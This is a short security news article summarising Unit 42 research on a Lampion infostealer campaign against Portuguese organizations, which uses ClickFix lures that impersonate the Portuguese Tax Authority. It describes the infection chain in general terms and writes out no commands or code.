Palo Alto Networks’ Unit 42 researchers have uncovered a sophisticated malicious campaign aimed at dozens of Portuguese organizations, with a focus on the government, finance, and transportation sectors. The campaign is the latest operation by the threat actors behind the Lampion malware, an infostealer known for its focus on sensitive banking data, which has been in circulation at least 2019.
The campaign has been active from late 2024 through early 2025, according to the researchers. The new campaign involves a social engineering technique known as ClickFix, a method first observed gaining traction among various malware families in late 2024. ClickFix lures victims into executing malicious PowerShell commands on their machines under the guise of resolving computer issues, such as software installation errors or missing updates.
ClickFix has become an increasingly popular vector for crimeware operators, including those behind Lumma Stealer and NetSupport RAT.
The campaign mirrors previous Lampion malware activity, both in its infrastructure and its use of tactics, techniques, and procedures (TTPs). Researchers observed the attackers using heavily obfuscated Visual Basic (VB) scripts, and phishing lures that bear striking similarities to prior Lampion campaigns.
The infection chain begins with a phishing email containing a malicious ZIP file. The ZIP archive contains an HTML file that, when opened, redirects the user to a spoofed website impersonating the Portuguese Tax Authority (Autoridade Tributária e Aduaneira). The fake website then presents a fake document or installation screen, prompting users to copy and run a PowerShell command.
Once executed, the command downloads and runs an obfuscated VBScript, initiating the next stage of infection. Although the researchers found the final malware payload commented out in the samples analyzed, the rest of the infection chain was intact and functional. This suggests the attackers may be preparing for a broader deployment, potentially delivering active payloads in future waves.
“Another interesting aspect of Lampion’s infection chain is that it is divided into several non-consecutive stages, executed as separate processes,” the researchers said. “This dispersed execution complicates detection, as the attack flow does not form a readily identifiable process tree. Instead, it comprises a complex chain of individual events, some of which could appear benign in isolation.”
